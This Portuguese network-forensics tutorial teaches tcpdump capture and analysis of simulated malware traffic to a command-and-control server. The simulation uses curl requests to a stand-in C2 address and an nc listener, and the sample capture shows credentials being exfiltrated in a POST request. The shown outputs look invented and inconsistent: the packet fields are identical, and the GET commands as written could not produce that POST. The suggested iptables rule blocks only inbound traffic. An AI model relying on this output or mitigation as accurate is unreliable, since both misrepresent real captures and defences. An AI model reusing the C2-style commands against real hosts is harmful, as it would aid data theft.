Forense Digital com Linux – Técnicas práticas – parte 5

A análise de tráfego de rede com o tcpdump é uma técnica poderosa para identificar atividades maliciosas, como a comunicação de malware entre duas máquinas. Neste exemplo prático, vamos simular a análise de um tráfego de rede entre duas máquinas, onde uma delas está infectada por um malware que se comunica com um servidor de comando e controle (C2).

 

 

Cenário de exemplo

  • Máquina infectada: Executa um malware que se comunica com um servidor C2.

  • Máquina alvo: Servidor C2 que recebe comandos e envia instruções ao malware.

  • Ferramentatcpdump para capturar e analisar o tráfego de rede.

 

Passo 1: Capturar o tráfego com tcpdump

1.1 Executar o tcpdump na máquina infectada

Na máquina infectada, execute o seguinte comando para capturar o tráfego na interface de rede (eth0):

sudo tcpdump -i eth0 -w captura.pcap

  • -i eth0: Especifica a interface de rede.

  • -w captura.pcap: Salva a captura em um arquivo .pcap para análise posterior.

 

1.2 Simular a comunicação do malware

O malware na máquina infectada se comunica com o servidor C2 na máquina alvo. Vamos simular essa comunicação enviando pacotes suspeitos.

 

Na máquina infectada:

curl http://192.168.1.100:8080/update
curl http://192.168.1.100:8080/data

Na máquina alvo (servidor C2):

nc -l -p 8080

Passo 2: Analisar o tráfego capturado

Após capturar o tráfego, pare o tcpdump (pressione Ctrl+C) e analise o arquivo captura.pcap.

 

2.1 Filtrar tráfego HTTP

Use o tcpdump para filtrar apenas o tráfego HTTP (porta 8080):

 

sudo tcpdump -r captura.pcap -nn 'tcp port 8080'

  • -r captura.pcap: Lê o arquivo de captura.

  • -nn: Exibe endereços IP e portas em formato numérico.

  • 'tcp port 8080': Filtra apenas o tráfego TCP na porta 8080.

 

Saída no Shell:

14:32:01.123456 IP 192.168.1.200.54321 > 192.168.1.100.8080: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
14:32:01.123457 IP 192.168.1.100.8080 > 192.168.1.200.54321: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
14:32:01.123458 IP 192.168.1.200.54321 > 192.168.1.100.8080: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
14:32:01.123459 IP 192.168.1.100.8080 > 192.168.1.200.54321: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
...

Análise:

  • A máquina infectada (192.168.1.200) está se comunicando com o servidor C2 (192.168.1.100) na porta 8080.

  • O tráfego consiste em pacotes PUSH (Flags [P.]), indicando que dados estão sendo enviados e recebidos.

 

2.2 Identificar padrões de comunicação

Para identificar padrões de comunicação, você pode contar o número de pacotes por IP de origem.

 

Comando:

sudo tcpdump -r captura.pcap -nn 'tcp port 8080' | awk '{print $3}' | 
cut -d. -f1-4 | sort | uniq -c | sort -nr

Saída no Shell:

1000 192.168.1.200

Análise:

  • A máquina infectada (192.168.1.200) está enviando um grande número de pacotes para o servidor C2.

  • Isso é característico de uma comunicação maliciosa, onde o malware envia dados ou recebe instruções.

 

2.3 Analisar conteúdo das requisições

Para entender o tipo de comunicação, você pode inspecionar o conteúdo das requisições HTTP.

 

Comando:

sudo tcpdump -r captura.pcap -nn -A 'tcp port 8080'

Saída no Shell:

14:32:01.123456 IP 192.168.1.200.54321 > 192.168.1.100.8080: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
E..4..@[email protected].....'...........GET /update HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: curl/7.68.0
...

14:32:01.123457 IP 192.168.1.200.54321 > 192.168.1.100.8080: Flags [P.], seq 1:100, 
ack 1, win 65535, length 99
E..4..@[email protected].....'...........POST /data HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: curl/7.68.0
Content-Length: 123
Content-Type: application/x-www-form-urlencoded

username=admin&password=secret&data=exfiltrated_info

Análise:

  • As requisições são direcionadas a endpoints específicos, como /update e /data.

  • O conteúdo da requisição POST inclui dados sensíveis, como usernamepassword, e data=exfiltrated_info.

  • Isso sugere que o malware está exfiltrando informações para o servidor C2.

 

Passo 3: Mitigar ameaça

Com base na análise, você pode tomar medidas para mitigar a ameaça:

  • Bloquear o IP do Servidor C2:

    • Use um firewall para bloquear o IP 192.168.1.100.

    Exemplo com iptables

    sudo iptables -A INPUT -s 192.168.1.100 -j DROP

  • Monitorar o Tráfego:

    • Configure alertas para detectar comunicações suspeitas com IPs desconhecidos.

  • Isolar a Máquina Infectada:

    • Desconecte a máquina infectada da rede para evitar a propagação do malware.

  • Analisar o Malware:

    • Use ferramentas como Ghidra ou IDA Pro para analisar o binário do malware e entender suas funcionalidades.

 

Conclusão

Neste exemplo prático, utilizamos o tcpdump para capturar e analisar o tráfego de rede, identificando uma comunicação maliciosa entre uma máquina infectada e um servidor C2. A análise revelou requisições HTTP suspeitas e a exfiltração de dados sensíveis.

Combinando ferramentas como tcpdump com técnicas de mitigação, você pode proteger seus sistemas contra ameaças cibernéticas e entender como os malwares operam em redes comprometidas. Para análises mais avançadas, considere usar ferramentas como Wireshark ou Suricata.

 

Referências bibliográficas

 

1. Documentação Oficial do tcpdump

  • Título: Manual do tcpdump

  • Autor: The Tcpdump Group

  • Disponível emhttps://www.tcpdump.org/manpages/tcpdump.1.html

  • Descrição: A documentação oficial do tcpdump fornece informações detalhadas sobre como usar a ferramenta, incluindo opções de linha de comando e exemplos práticos.

 

2. Livro: “Network Forensics: Tracking Hackers through Cyberspace”

  • Autores: Sherri Davidoff, Jonathan Ham

  • Editora: Prentice Hall

  • Ano: 2012

  • ISBN: 978-0132564717

  • Descrição: Este livro aborda técnicas de análise forense de rede, incluindo o uso de ferramentas como o tcpdump para identificar atividades maliciosas.

 

3. Livro: “Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems”

  • Autor: Chris Sanders

  • Editora: No Starch Press

  • Ano: 2017

  • ISBN: 978-1593278021

  • Descrição: Embora focado no Wireshark, este livro também discute conceitos fundamentais de análise de tráfego de rede que são aplicáveis ao tcpdump.

 

4. Documentação do Wireshark

  • Título: Wireshark User’s Guide

  • Disponível emhttps://www.wireshark.org/docs/

  • Descrição: A documentação do Wireshark, outra ferramenta popular de análise de tráfego, complementa o conhecimento sobre o tcpdump, pois ambas as ferramentas são frequentemente usadas em conjunto.